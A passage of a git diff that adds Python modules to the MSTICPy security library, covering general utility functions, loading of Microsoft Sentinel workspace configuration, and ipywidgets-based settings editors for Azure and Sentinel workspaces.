+        If this is previously-created display handle, this is used as the
+        target display object to update it with the content of this call,
+        by default None
+
+    """
+    return md(f"Error: {string}", "bold, orange, large", disp_id)
+
+
+# Styles available to use in the above Markdown tools.
+_F_STYLES = {
+    "bold": "font-weight: bold",
+    "italic": "font-style: italic",
+    "red": "color: red",
+    "green": "color: green",
+    "blue": "color: blue",
+    "large": "font-size: 130%",
+    "heading": "font-size: 200%",
+}
+
+
+@export
+def is_ipython() -> bool:
+    """
+    Return True if running in IPython environment.
+
+    Returns
+    -------
+    bool
+        True if running in IPython environment,
+        otherwise False
+
+    """
+    return bool(get_ipython())
+
+
+def check_kwarg(arg_name: str, legal_args: List[str]):
+    """
+    Check argument names against a list.
+
+    Parameters
+    ----------
+    arg_name : str
+        Argument to check
+    legal_args : List[str]
+        List of possible arguments.
+
+    Raises
+    ------
+    NameError
+        If the argument is not legal. If the `arg_name` is
+        a close match to one or more, `legal_args` these are
+        returned in the exception.
+
+    """
+    if arg_name not in legal_args:
+        closest = difflib.get_close_matches(arg_name, legal_args)
+        mssg = f"{arg_name} is not a recognized argument or attribute. "
+        if len(closest) == 1:
+            mssg += f"Closest match is '{closest[0]}'"
+        elif closest:
+            match_list = [f"'{mtch}'" for mtch in closest]
+            mssg += f"Closest matches are {', '.join(match_list)}"
+        else:
+            mssg += f"Valid options are {', '.join(legal_args)}"
+        raise NameError(arg_name, mssg)
+
+
+def check_kwargs(supplied_args: Dict[str, Any], legal_args: List[str]):
+    """
+    Check all kwargs names against a list.
+
+    Parameters
+    ----------
+    supplied_args : Dict[str, Any]
+        Arguments to check
+    legal_args : List[str]
+        List of possible arguments.
+
+    Raises
+    ------
+    NameError
+        If any of the arguments are not legal. If the an arg is
+        a close match to one or more `legal_args`, these are
+        returned in the exception.
+
+    """
+    name_errs = []
+    for name in supplied_args:
+        try:
+            check_kwarg(name, legal_args)
+        except NameError as err:
+            name_errs.append(err)
+    if name_errs:
+        raise NameError(name_errs)
+
+
+_U_TEST_ENV = "MP_UNIT_TEST"
+
+
+def unit_testing() -> bool:
+    """
+    Return True if in unit testing.
+
+    Returns
+    -------
+    bool
+        True if in unit testing
+
+    """
+    return _U_TEST_ENV in os.environ
+
+
+# pylint: disable=invalid-name
+def set_unit_testing(on: bool = True):
+    """
+    Set flag env var to indicated that code is being unit-tested.
+
+    Parameters
+    ----------
+    on : bool, optional
+        Turn unit testing flag on or off, by default True
+
+    """
+    if on:
+        os.environ[_U_TEST_ENV] = "True"
+    else:
+        os.environ.pop(_U_TEST_ENV, None)
+
+
+# pylint: enable=invalid-name
+
+
+def is_valid_uuid(uuid_str: Any) -> bool:
+    """
+    Return true if `uuid_str` is a value GUID/UUID.
+
+    Parameters
+    ----------
+    uuid_str : Any
+        String to test
+
+    Returns
+    -------
+    bool
+        True if valid GUID/UUID.
+
+    """
+    if not uuid_str:
+        return False
+    try:
+        uuid.UUID(uuid_str)
+    except (ValueError, TypeError):
+        return False
+    return True
+
+
+def valid_pyname(identifier: str) -> str:
+    """
+    Return legal Python identifier, which doesn't collide with builtins.
+
+    Parameters
+    ----------
+    identifier : str
+        The input identifier
+
+    Returns
+    -------
+    str
+        The cleaned identifier
+
+    """
+    builtin_names = set(dir(builtins))
+    if identifier in builtin_names:
+        identifier = f"{identifier}_bi"
+    identifier = re.sub("[^a-zA-Z0-9_]", "_", identifier)
+    if identifier[0].isdigit():
+        identifier = f"n_{identifier}"
+    return identifier
+
+
+# Define generic type so enum_parse returns the same type as
+# passed in 'enum_class
+EnumType = TypeVar("EnumType")
+
+
+def enum_parse(enum_cls: Type[EnumType], value: str) -> Optional[EnumType]:
+    """
+    Try to parse a string value to an Enum member.
+
+    Parameters
+    ----------
+    enum_cls : EnumType
+        The Enum type to check against
+    value : str
+        The enum value to parse
+
+    Returns
+    -------
+    Optional[EnumType]
+        The enumeration value matching `value` or None
+
+    Raises
+    ------
+    TypeError
+        If something other than an Enum subclass is passed.
+
+    """
+    if not issubclass(enum_cls, Enum):  # type: ignore
+        raise TypeError("Can only be used with classes derived from enum.Enum.")
+    if value in enum_cls.__members__:  # type: ignore
+        return enum_cls.__members__[value]  # type: ignore
+    val_lc = value.casefold()
+    val_map = {name.casefold(): name for name in enum_cls.__members__}  # type: ignore
+    if val_lc in val_map:
+        return enum_cls.__members__[val_map[val_lc]]  # type: ignore
+    return None
+
+
+def arg_to_list(arg: Union[str, List[str]], delims=",; ") -> List[str]:
+    """
+    Convert an optional list/str/str with delims into a list.
+
+    Parameters
+    ----------
+    arg : Union[str, List[str]]
+        A string, delimited string or list
+    delims : str, optional
+        The default delimiters to use, by default ",; "
+
+    Returns
+    -------
+    List[str]
+        List of string components
+
+    Raises
+    ------
+    TypeError
+        If `arg` is not a string or list
+
+    """
+    if isinstance(arg, list):
+        return arg
+    if isinstance(arg, str):
+        for char in delims:
+            if char in arg:
+                return [item.strip() for item in arg.split(char)]
+        return [arg]
+    raise TypeError("`arg` must be a string or a list.")
+
+
+def collapse_dicts(*dicts: Dict[Any, Any]) -> Dict[Any, Any]:
+    """Merge multiple dictionaries - later dicts have higher precendence."""
+    if len(dicts) < 2:
+        return dicts[0] or {}
+    out_dict = dicts[0]
+    for p_dict in dicts[1:]:
+        out_dict = _merge_dicts(out_dict, p_dict)
+    return out_dict
+
+
+def _merge_dicts(dict1: Dict[Any, Any], dict2: Dict[Any, Any]):
+    """Merge dict2 into dict1."""
+    if not dict2:
+        return dict1 or {}
+    if not dict1:
+        return dict2 or {}
+    out_dict = {}
+    for key in set().union(dict1, dict2):  # type: Any
+        if (
+            key in dict1
+            and isinstance(dict1[key], dict)
+            and key in dict2
+            and isinstance(dict2[key], dict)
+        ):
+            d_val = _merge_dicts(dict1[key], dict2[key])
+        elif key in dict2:
+            d_val = dict2[key]
+        else:
+            d_val = dict1[key]
+        out_dict[key] = d_val
+    return out_dict
+
+
+def _get_mp_ua():
+    """Build a MSTICPy specific User Agent string."""
+    return f"MSTICPy{VERSION}-Python{python_version()}"
+
+
+# User Agent string for MSTICPy
+_MSTICPY_USER_AGENT = _get_mp_ua()
+
+
+def search_for_file(
+    pattern: str, paths: List[Union[str, Path]] = None
+) -> Optional[str]:
+    """Search `paths` for file `pattern`."""
+    paths = paths or [".", ".."]
+    for start_path in paths:
+        found_files = list(Path(start_path).glob(pattern))
+        if found_files:
+            return str(found_files[0])
+    return None
diff --git a/msticpy/common/wsconfig.py b/msticpy/common/wsconfig.py
new file mode 100644
index 000000000..e5ea7beb3
--- /dev/null
+++ b/msticpy/common/wsconfig.py
@@ -0,0 +1,352 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module for Log Analytics-related configuration."""
+
+import os
+import json
+from typing import Dict, Any, Optional
+from pathlib import Path
+
+from IPython.display import display
+import ipywidgets as widgets
+
+from .exceptions import MsticpyUserConfigError
+from .utility import export, is_valid_uuid, md, md_warn
+from . import pkg_config
+from .._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+_RESOURCES = [
+    (
+        "https://github.com/Azure/Azure-Sentinel-Notebooks/blob/"
+        "master/ConfiguringNotebookEnvironment.ipynb"
+    ),
+    (
+        "https://github.com/Azure/Azure-Sentinel-Notebooks/blob/"
+        "master/A%20Getting%20Started%20Guide%20For%20Azure%20"
+        "Sentinel%20ML%20Notebooks.ipynb"
+    ),
+]
+
+_NO_CONFIG_WARN = [
+    "Could not find Microsoft Sentinel settings in msticpyconfig.yaml or a config.json ",
+    "(in the current directory or via a MSTICPYCONFIG variable.)",
+    "We found the file '{config_file}' and will use this.",
+    "We recommend using an explicit msticpyconfig.yaml specified using the",
+    "MSTICPYCONFIG environment variable. See:",
+    (
+        "https://msticpy.readthedocs.io/en/latest/data_acquisition/DataProviders.html#"
+        "connecting-to-an-azure-sentinel-workspace"
+    ),
+    "and",
+    "https://msticpy.readthedocs.io/en/latest/getting_started/msticpyconfig.html",
+    "for more details.",
+    "Also see the notebooks:",
+    *_RESOURCES,
+]
+
+_NO_CONFIG_ERR = [
+    "Could not find msticpyconfig.yaml or config.json.",
+    "The 'config.json' file is created when you launch notebooks from "
+    "Microsoft Sentinel. If you have copied the notebook to another location "
+    "or folder you will need to copy this configuration file.",
+    "Alternatively, we recommend using an explicit msticpyconfig.yaml"
+    "and adding your Workspace and Tenant IDs to that file.",
+    "",
+    "You can create a settings file using the following commands:",
+    ">>> from msticpy.config import MpConfigEdit",
+    ">>> MpConfigEdit()",
+]
+
+WIDGET_DEFAULTS = {
+    "layout": widgets.Layout(width="95%"),
+    "style": {"description_width": "150px"},
+}
+
+
+@export
+class WorkspaceConfig:
+    """Workspace configuration class."""
+
+    # Constants
+    TENANT_ID = "{{cookiecutter.tenant_id}}"
+    SUBSCRIPTION_ID = "{{cookiecutter.subscription_id}}"
+    RESOURCE_GROUP = "{{cookiecutter.resource_group}}"
+    WORKSPACE_ID = "{{cookiecutter.workspace_id}}"
+    WORKSPACE_NAME = "{{cookiecutter.workspace_name}}"
+
+    PKG_CONF_TENANT_KEY = "TenantId"
+    PKG_CONF_WS_KEY = "WorkspaceId"
+    PKG_CONF_SUB_KEY = "SubscriptionId"
+    PKG_CONF_RES_GROUP_KEY = "ResourceGroup"
+    PKG_CONF_NAME_KEY = "WorkspaceName"
+
+    CONF_WS_ID_KEY = "workspace_id"
+    CONF_TENANT_ID_KEY = "tenant_id"
+    CONF_SUB_ID_KEY = "subscription_id"
+    CONF_RES_GROUP_KEY = "resource_group"
+    CONF_WS_NAME_KEY = "workspace_name"
+
+    def __init__(
+        self,
+        workspace: Optional[str] = None,
+        config_file: Optional[str] = None,
+        interactive: bool = True,
+    ):
+        """
+        Load current Azure Notebooks configuration for Log Analytics.
+
+        Parameters
+        ----------
+        config_file : Optional[str], optional
+            path to a configuration file,
+            If not specified, the defaults is to use a configured msticpyconfig.yaml
+            If this isn't configured, it will search for (first) a config.json
+            and (second) a msticpyconfig.yaml in (first) the current directory
+            and (second) the parent directory and subfolders.
+        workspace : str, Optional[str]
+            Workspace name (where multiple workspaces are configured),
+            by default the Default workspace will be used.
+        interactive : bool, optional
+            If this is False, initializing the class will not raise an
+            exception if no configuration is found. By default, True.
+
+        """
+        self._config: Dict[str, str] = {}
+        self._interactive = interactive
+        self._config_file = config_file
+        # If config file specified, use that
+        if config_file:
+            self._config.update(self._read_config_values(config_file))
+        else:
+            self._determine_config_source(workspace)
+
+    def _determine_config_source(self, workspace):
+        # First, try default MSTICPy config
+        self._read_pkg_config_values(workspace_name=workspace)
+        if self.config_loaded:
+            return
+        # Next, search for a config.json in the current director
+        if Path("./config.json").exists():
+            self._config_file = "./config.json"
+        else:
+            self._config_file = self._search_for_file("**/config.json")
+        if self._config_file:
+            self._config.update(self._read_config_values(self._config_file))
+            return
+
+        # Finally, search for a msticpyconfig.yaml
+        if (
+            os.environ.get("MSTICPYCONFIG")
+            and Path(os.environ.get("MSTICPYCONFIG")).exists()
+        ):
+            self._config_file = os.environ.get("MSTICPYCONFIG")
+        elif Path("./msticpyconfig.yaml").exists():
+            self._config_file = "./msticpyconfig.yaml"
+        else:
+            self._config_file = self._search_for_file("**/msticpyconfig.yaml")
+        if self._config_file:
+            os.environ["MSTICPYCONFIG"] = self._config_file
+            pkg_config.refresh_config()
+            self._read_pkg_config_values(workspace_name=workspace)
+            return
+        # Finally, throw an exception (unless non-interactive)
+        if self._interactive:
+            # If we've arrived here after searching current folder and parent
+            # then we give up. (We create but don't raise an actual exception)
+            display(
+                MsticpyUserConfigError(
+                    *_NO_CONFIG_ERR,
+                    title="Workspace configuration missing.",
+                    **{f"nb_{idx}_uri": res for idx, res in enumerate(_RESOURCES)},
+                )
+            )
+
+    def __getitem__(self, key: str):
+        """Allow property get using dictionary key syntax."""
+        if key in self._config:
+            return self._config[key]
+        raise KeyError
+
+    def __setitem__(self, key: str, value: Any):
+        """Allow property set using dictionary key syntax."""
+        self._config[key] = value
+
+    def __contains__(self, key: str):
+        """Allow property in test."""
+        # In operator overload
+        return key == "Type" or key in self._config or key in self.__dict__
+
+    def __repr__(self):
+        """Return contents of current config."""
+        return self._config.__repr__()
+
+    @property
+    def config_loaded(self) -> bool:
+        """
+        Return True if workspace id and tenant id have values.
+
+        Returns
+        -------
+        bool
+            True if configuration loaded.
+
+        """
+        ws_value = self._config.get(self.CONF_WS_ID_KEY, None)
+        ten_value = self._config.get(self.CONF_TENANT_ID_KEY, None)
+        return is_valid_uuid(ws_value) and is_valid_uuid(ten_value)  # type: ignore
+
+    @property
+    def code_connect_str(self) -> str:
+        """
+        Return the Log Analytics connection string for dev code auth.
+
+        Returns
+        -------
+        str
+            Connection string
+
+        """
+        ten_id = self._config.get(self.CONF_TENANT_ID_KEY, None)
+        ws_id = self._config.get(self.CONF_WS_ID_KEY, None)
+        if not ten_id:
+            raise KeyError(
+                f"Configuration setting for {self.CONF_TENANT_ID_KEY} "
+                + "could not be found."
+            )
+        if not ws_id:
+            raise KeyError(
+                f"Configuration setting for {self.CONF_WS_ID_KEY} "
+                + "could not be found."
+            )
+        return f"loganalytics://code().tenant('{ten_id}').workspace('{ws_id}')"
+
+    @staticmethod
+    def _read_config_values(file_path: str) -> Dict[str, str]:
+        """Read configuration file."""
+        if not file_path:
+            return {}
+        try:
+            with open(file_path, "r", encoding="utf-8") as json_file:
+                if json_file:
+                    return json.load(json_file)
+        except json.JSONDecodeError:
+            pass
+        return {}
+
+    @classmethod
+    def list_workspaces(cls) -> Dict:
+        """
+        Return list of available workspaces.
+
+        Returns
+        -------
+        Dict
+            Dictionary of workspaces with workspace and tenantIds.
+
+        """
+        ws_settings = pkg_config.settings.get("AzureSentinel", {}).get("Workspaces")
+        if not ws_settings:
+            return {}
+        return {
+            ws_name: {
+                cls.PKG_CONF_WS_KEY: ws.get(cls.PKG_CONF_WS_KEY),
+                cls.PKG_CONF_TENANT_KEY: ws.get(cls.PKG_CONF_TENANT_KEY),
+            }
+            for ws_name, ws in ws_settings.items()
+        }
+
+    def prompt_for_ws(self):
+        """Display an interactive prompt for Workspace details."""
+        md_warn("No Microsoft Sentinel configuration found.")
+        md(
+            "Please enter the workspace ID and tenant Id"
+            + " to allow connection to the Microsoft Sentinel workspace."
+        )
+        ws_id_wgt = widgets.Text(description="Workspace Id:", **WIDGET_DEFAULTS)
+        ten_id_wgt = widgets.Text(description="Tenant Id:", **WIDGET_DEFAULTS)
+
+        def update_ws(chg):
+            self["workspace_id"] = chg.get("new")
+
+        def update_tnt(chg):
+            self["tenant_id"] = chg.get("new")
+
+        ws_id_wgt.observe(update_ws, names="value")
+        ten_id_wgt.observe(update_tnt, names="value")
+        display(widgets.VBox([ws_id_wgt, ten_id_wgt]))
+        md(
+            (
+                "You can avoid this prompt in future by following the"
+                " guidance in the"
+                " <a href='https://msticpy.readthedocs.io/en/latest/"
+                "data_acquisition/DataProviders.html#"
+                "connecting-to-an-azure-sentinel-workspace' "
+                "target='_blank' rel='noopener noreferrer'>"
+                "Connecting to a Microsoft Sentinel Workspace</a>"
+            ),
+        )
+
+    def _read_pkg_config_values(self, workspace_name: str = None):
+        as_settings = pkg_config.settings.get("AzureSentinel")
+        if not as_settings:
+            return {}
+        ws_settings = as_settings.get("Workspaces")  # type: ignore
+        if not ws_settings:
+            return {}
+        if workspace_name and workspace_name in ws_settings:
+            selected_workspace = ws_settings[workspace_name]
+        elif "Default" in ws_settings:
+            selected_workspace = ws_settings["Default"]
+        else:
+            return {}
+        if (
+            selected_workspace
+            and self.PKG_CONF_WS_KEY in selected_workspace
+            and self.PKG_CONF_TENANT_KEY in selected_workspace
+        ):
+            self._config[self.CONF_WS_ID_KEY] = selected_workspace.get(
+                self.PKG_CONF_WS_KEY
+            )
+            self._config[self.CONF_TENANT_ID_KEY] = selected_workspace.get(
+                self.PKG_CONF_TENANT_KEY
+            )
+        if self.PKG_CONF_SUB_KEY in selected_workspace:
+            self._config[self.CONF_SUB_ID_KEY] = selected_workspace.get(
+                self.PKG_CONF_SUB_KEY
+            )
+        if self.PKG_CONF_RES_GROUP_KEY in selected_workspace:
+            self._config[self.CONF_RES_GROUP_KEY] = selected_workspace.get(
+                self.PKG_CONF_RES_GROUP_KEY
+            )
+        if self.PKG_CONF_NAME_KEY in selected_workspace:
+            self._config[self.CONF_WS_NAME_KEY] = selected_workspace.get(
+                self.PKG_CONF_NAME_KEY
+            )
+        return {}
+
+    def _search_for_file(self, pattern: str) -> Optional[str]:
+        config_file = None
+        for start_path in (".", ".."):
+            searched_configs = list(Path(start_path).glob(pattern))
+            for found_file in searched_configs:
+                if found_file.name == "msticpyconfig.yaml":
+                    config_file = str(found_file)
+                    break
+                test_content = self._read_config_values(str(found_file))
+                if "workspace_id" in test_content:
+                    config_file = str(found_file)
+                    break
+            if config_file:
+                break
+        if config_file:
+            # Warn that we're using a "found" file, not one in the current directory
+            print("Warning")
+            print("\n".join(_NO_CONFIG_WARN).format(config_file=config_file))
+        return config_file
diff --git a/msticpy/config/__init__.py b/msticpy/config/__init__.py
new file mode 100644
index 000000000..fe368d1e9
--- /dev/null
+++ b/msticpy/config/__init__.py
@@ -0,0 +1,11 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""MSTICPY Config modules."""
+
+# flake8: noqa: F403
+from .mp_config_edit import MpConfigEdit
+from .mp_config_file import MpConfigFile
+from .mp_config_control import MpConfigControls
diff --git a/msticpy/config/ce_azure.py b/msticpy/config/ce_azure.py
new file mode 100644
index 000000000..aecb00ea8
--- /dev/null
+++ b/msticpy/config/ce_azure.py
@@ -0,0 +1,46 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Azure component edit."""
+from .._version import VERSION
+from .ce_simple_settings import CESimpleSettings
+
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+class CEAzure(CESimpleSettings):
+    """Azure settings edit component."""
+
+    _DESCRIPTION = "Azure Defaults"
+    _COMP_PATH = "Azure"
+    _HELP_TEXT = """
+    Set the parameters for your Azure cloud settings here.<br>
+
+    <b>cloud</b> should be set to the Azure Cloud that you use.
+    Options are:
+    <ul>
+    <li>global (Commercial Azure cloud)</li>
+    <li>usgov (US Government cloud)</li>
+    <li>cn (China national cloud)</li>
+    <li>de (German national cloud)</li>
+    </ul>
+    The default is "global".<br>
+
+    <b>auth_methods</b> is the default set of methods to use for Azure authentication.
+    These can be overridden by settings of individual component settings. The options are:
+    <ul>
+    <li>env - take credential information from environment variables</li>
+    <li>msi - use Managed Service Identity credentials, if available</li>
+    <li>cli - use Azure CLI credentials, if available</li>
+    <li>interactive - use interactive browser authentication</li>
+    </ul>
+    """
+    _HELP_URI = {
+        "MSTICPy Package Configuration": (
+            "https://msticpy.readthedocs.io/en/latest/getting_started/msticpyconfig.html"
+        )
+    }
diff --git a/msticpy/config/ce_azure_sentinel.py b/msticpy/config/ce_azure_sentinel.py
new file mode 100644
index 000000000..4c93fb312
--- /dev/null
+++ b/msticpy/config/ce_azure_sentinel.py
@@ -0,0 +1,245 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module docstring."""
+from datetime import datetime
+
+import ipywidgets as widgets
+
+from .._version import VERSION
+from .ce_common import ITEM_LIST_LAYOUT, print_debug
+from .ce_common import get_wgt_ctrl, get_or_create_mpc_section
+from .comp_edit import CEItemsBase, CompEditDisplayMixin
+from .mp_config_control import MpConfigControls
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=too-many-ancestors
+class CEAzureSentinel(CEItemsBase):
+    """Microsoft Sentinel Workspaces editor component."""
+
+    _DESCRIPTION = "Microsoft Sentinel workspace settings"
+    _COMP_PATH = "AzureSentinel.Workspaces"
+    _HELP_TEXT = """
+    Supply the parameters for your Microsoft Sentinel workspaces here.<br>
+
+    You can get all of these (apart from 'TenantID') from your workspace portal.
+    Navigate to "Settings" (on the left side of the screen), then click the
+    "Workspace Settings" tab near the top of the page.
+
+    The Tenant ID is the only value missing from this settings page. If you cannot
+    find this you can use the following code to try to look it up:
+    <pre>
+    from msticpy.common.config.ce_common import get_def_tenant_id
+    get_def_tenant_id("{workspace-subscription-id}")
+    </pre>
+
+    The name that you use for workspace (the "Name" text box) does not have to
+    be the same as the official name. You can use any helpful name that you
+    like. You can even have the same workspace included multiple times with
+    different names.
+
+    There is a special case of the workspace name "Default". Normally, when you
+    connect to a workspace you need to supply the name corresponding to the
+    workspace entry in your settings. If you give a workspace the name "Default"
+    it will be picked if you do not specify a name. Note, the "Default" entry
+    can be a duplicate of another named entry.
+    """
+    _HELP_URI = {
+        "Connecting to a Microsoft Sentinel Workspace": (
+            "https://msticpy.readthedocs.io/en/latest/data_acquisition/"
+            + "DataProviders.html#connecting-to-an-azure-sentinel-workspace"
+        ),
+        "Help on this tab": (
+            "https://msticpy.readthedocs.io/en/latest/getting_started/"
+            + "SettingsEditor.html#azure-sentinel-workspaces"
+        ),
+    }
+
+    def __init__(self, mp_controls: MpConfigControls):
+        """
+        Initialize an instance of CEAzureSentinel.
+
+        Parameters
+        ----------
+        mp_controls : MpConfigControls
+            The config/controls/settings database
+
+        """
+        super().__init__(mp_controls)
+
+        get_or_create_mpc_section(self.mp_controls, self._COMP_PATH)
+        self.select_item.options = self._get_select_opts()
+        self.select_item.layout = ITEM_LIST_LAYOUT["layout"]
+        self.select_item.style = ITEM_LIST_LAYOUT["style"]
+        self.select_item.description = "Workspaces"
+        self.select_item.observe(self._select_provider, names="label")
+
+        prov_name = self.select_item.label
+        self.edit_ctrls = _get_ws_ctrls(prov_name, self.mp_controls, self._COMP_PATH)
+        self.edit_ctrls.children[0].value = prov_name or ""
+        self.btn_set_default = widgets.Button(description="Set as default")
+        if prov_name:
+            self.edit_frame.children = [self.edit_ctrls, self.btn_set_default]
+        else:
+            self.edit_frame.children = [self.edit_ctrls]
+        self.edit_buttons.btn_del.on_click(self._del_item)
+        self.edit_buttons.btn_add.on_click(self._add_item)
+        self.edit_buttons.btn_save.on_click(self._save_item)
+        self.btn_set_default.on_click(self._set_default)
+
+        self.current_workspace = prov_name
+
+    @property
+    def _current_path(self):
+        return f"{self._COMP_PATH}.{self.select_item.label}"
+
+    def _get_select_opts(self):
+        """Get provider options to populate select list."""
+        provs = self.mp_controls.get_value(self._COMP_PATH)
+        return [(val, idx) for idx, val in enumerate(provs.keys())]
+
+    def _select_provider(self, change):
+        """Select a provider from the list."""
+        prov_name = change.get("new")
+        self.edit_ctrls = _get_ws_ctrls(prov_name, self.mp_controls, self._COMP_PATH)
+        self.edit_ctrls.children[0].value = prov_name
+        self.current_workspace = prov_name
+        self.edit_frame.children = [self.edit_ctrls, self.btn_set_default]
+        self.mp_controls.populate_ctrl_values(self.current_workspace)
+
+    def _add_item(self, btn):
+        """Add an item."""
+        del btn
+        # Generate a "unique" temp name
+        new_provider = f"NewWorkspace_{datetime.now().strftime('%f')[:4]}"
+        while new_provider in dict(self.select_item.options):
+            new_provider = f"NewWorkspace_{datetime.now().strftime('%f')[:4]}"
+        _get_ws_ctrls(new_provider, self.mp_controls, self._COMP_PATH)
+        self.mp_controls.save_ctrl_values(f"{self._COMP_PATH}.{new_provider}")
+        current_options = self._get_select_opts()
+        self.select_item.options = current_options
+        self.select_item.label = new_provider
+
+    def _del_item(self, btn):
+        """Delete an item."""
+        del btn
+        self.mp_controls.del_value(self._current_path)
+        remaining_opts = self._get_select_opts()
+        self.select_item.options = remaining_opts
+        if remaining_opts:
+            self.select_item.label = remaining_opts[-1][0]
+
+    def _save_item(self, btn):
+        """Save the current item."""
+        del btn
+        # Use may have edited the workspace name.
+        # If so save the existing one and rename the paths to match new name
+        edited_provider_name = self.edit_ctrls.children[0].value
+        self.mp_controls.save_ctrl_values(self._current_path)
+        if edited_provider_name != self.current_workspace and self.current_workspace:
+            self.mp_controls.rename_path(
+                f"{self._COMP_PATH}.{self.current_workspace}",
+                f"{self._COMP_PATH}.{edited_provider_name}",
+            )
+            self.select_item.options = self._get_select_opts()
+            self.select_item.label = edited_provider_name
+        valid, status = _validate_ws(
+            edited_provider_name, self.mp_controls, self._COMP_PATH
+        )
+        if not valid:
+            self.set_status(status)
+
+    def _set_default(self, btn):
+        """Set selected item to be the Default entry."""
+        del btn
+        src_wkspace = self.current_workspace
+        if src_wkspace == "Default" or not src_wkspace:
+            return
+        src_path = f"{self._COMP_PATH}.{src_wkspace}"
+        src_settings = self.mp_controls.get_value(src_path)
+        def_path = f"{self._COMP_PATH}.Default"
+        # save the src values to the Default key and refresh the select_item list
+        self.mp_controls.set_value(def_path, src_settings)
+        print_debug("Current options", self._get_select_opts())
+        self.select_item.options = self._get_select_opts()
+        self.select_item.label = "Default"
+
+    def _select_labels(self):
+        return [label for label, _ in self.select_item.options]
+
+
+_TEXT_PARAMS = {
+    "layout": widgets.Layout(width="70%"),
+    "style": {"description_width": "150px"},
+}
+
+
+def _get_ws_ctrls(workspace, mp_controls, conf_path):
+    """Return or create the control set for a workspace."""
+    defn_path = f"{conf_path}.Default"
+    prov_defn = mp_controls.get_defn(defn_path)
+
+    ctrls = [widgets.Text(description="Name", **_TEXT_PARAMS)]
+    if not workspace:
+        return widgets.VBox(ctrls, layout=CompEditDisplayMixin.no_border_layout("95%"))
+    prov_path = f"{conf_path}.{workspace}"
+    for setting in prov_defn:
+        wgt = get_wgt_ctrl(prov_path, setting, mp_controls)
+        wgt.layout = _TEXT_PARAMS["layout"]
+        wgt.style = _TEXT_PARAMS["style"]
+        ctrls.append(wgt)
+
+    return widgets.VBox(ctrls)
+
+
+def _validate_ws(workspace, mp_controls, conf_path):
+    """Validate the settings for a workspace."""
+    defn_path = f"{conf_path}.Default"
+
+    if not workspace:
+        return False, "Workspace name must be supplied."
+    prov_path = f"{conf_path}.{workspace}"
+    results = mp_controls.validate_setting(path=prov_path, defn_path=defn_path)
+    status = []
+    validated = True
+    for valid, mssg in results:
+        if not valid:
+            validated = False
+            status.append(mssg)
+    return validated, "  ".join(status)
+
+
+#
+#
+# _KNOWN_SEC_NAMES = ("AuthKey", "ApiID", "clientSecret", "password")
+
+
+# def _enum_template(template: Dict[str, Any]):
+#     output: Dict[str, Any] = {}
+#     for key, value in template.items():
+#         if key in _KNOWN_SEC_NAMES:
+#             output[key] = ""
+#         elif isinstance(value, dict):
+#             output[key] = _enum_template(value)
+#         elif isinstance(value, tuple):
+#             val_type, val_opt = value
+#             if val_type == "str":
+#                 output[key] = val_opt.get("default", "")
+#             elif val_type == "bool":
+#                 bool_str = val_opt.get("default", False)
+#                 if isinstance(bool_str, str):
+#                     output[key] = bool_str.casefold() == "true"
+#                 else:
+#                     output[key] = bool_str
+#             elif val_type == "int":
+#                 output[key] = int(val_opt.get("default", 0))
+#             elif val_type == "enum":
+#                 output[key] = val_opt.get("default", val_opt.get("options")[0])
+#         else:
+#             output[key] = value
+#     return output
diff --git a/msticpy/config/ce_common.py b/msticpy/config/ce_common.py
new file mode 100644
index 000000000..4b76d1589
--- /dev/null
+++ b/msticpy/config/ce_common.py
@@ -0,0 +1,395 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Component edit utility functions."""
+from typing import Any, Dict, Optional, Tuple, Union
+
+import ipywidgets as widgets
+import httpx
+
+from ..common.azure_auth_core import AzureCloudConfig
+from .comp_edit import SettingsControl
+from .._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+_DEBUG = False
+
+ITEM_LIST_LAYOUT = {
+    "layout": widgets.Layout(height="150px", width="300px"),
+    "style": {"description_width": "70px"},
+}
+
+SETTING_LIST_LAYOUT = {
+    "layout": widgets.Layout(height="150px", width="300px"),
+    "style": {"description_width": "100px"},
+}
+
+TEXT_LAYOUT = {
+    "layout": widgets.Layout(width="70%"),
+    "style": {"description_width": "100px"},
+}
+
+TEXT_AREA_LAYOUT = {
+    "layout": widgets.Layout(width="70%"),
+    "style": {"description_width": "100px"},
+}
+
+
+if _DEBUG:
+
+    def print_debug(*args):
+        """Print args to std_out (Debug version)."""
+        if not _DEBUG:
+            return
+        print(*args)
+
+else:
+
+    def print_debug(*args):
+        """Print nothing std_out (Prod version)."""
+        del args
+
+
+_TEXT_WIDGETS = (widgets.Text, widgets.Textarea, widgets.Label, widgets.Select)
+
+
+# pylint: disable=too-many-return-statements
+def py_to_widget(
+    value: Any, ctrl: Optional[widgets.Widget] = None, val_type: Optional[str] = None
+) -> Any:
+    """
+    Adjust type and format to suit target widget.
+
+    Parameters
+    ----------
+    value : Any
+        The value to process
+    ctrl : Optional[widgets.Widget], optional
+        The target widget type, by default None
+    val_type : Optional[str], optional
+        The target value type ("str", "bool"), by default None
+
+    Returns
+    -------
+    Any
+        The converted value
+
+    Raises
+    ------
+    ValueError
+        If neither a target control or expected val_type
+        are specified.
+
+    Notes
+    -----
+    This function handles conversion of None to an empty string
+    or bools expressed as text strings into actual bools.
+
+    """
+    if ctrl is None and val_type is None:
+        raise ValueError("Must specify either a target control or expected val_type.")
+    if (
+        isinstance(ctrl, widgets.Checkbox)
+        or val_type == "bool"
+        or isinstance(value, bool)
+    ):
+        if isinstance(value, str):
+            return value.casefold() == "true"
+        return bool(value)
+    if val_type == "txt_dict" or (
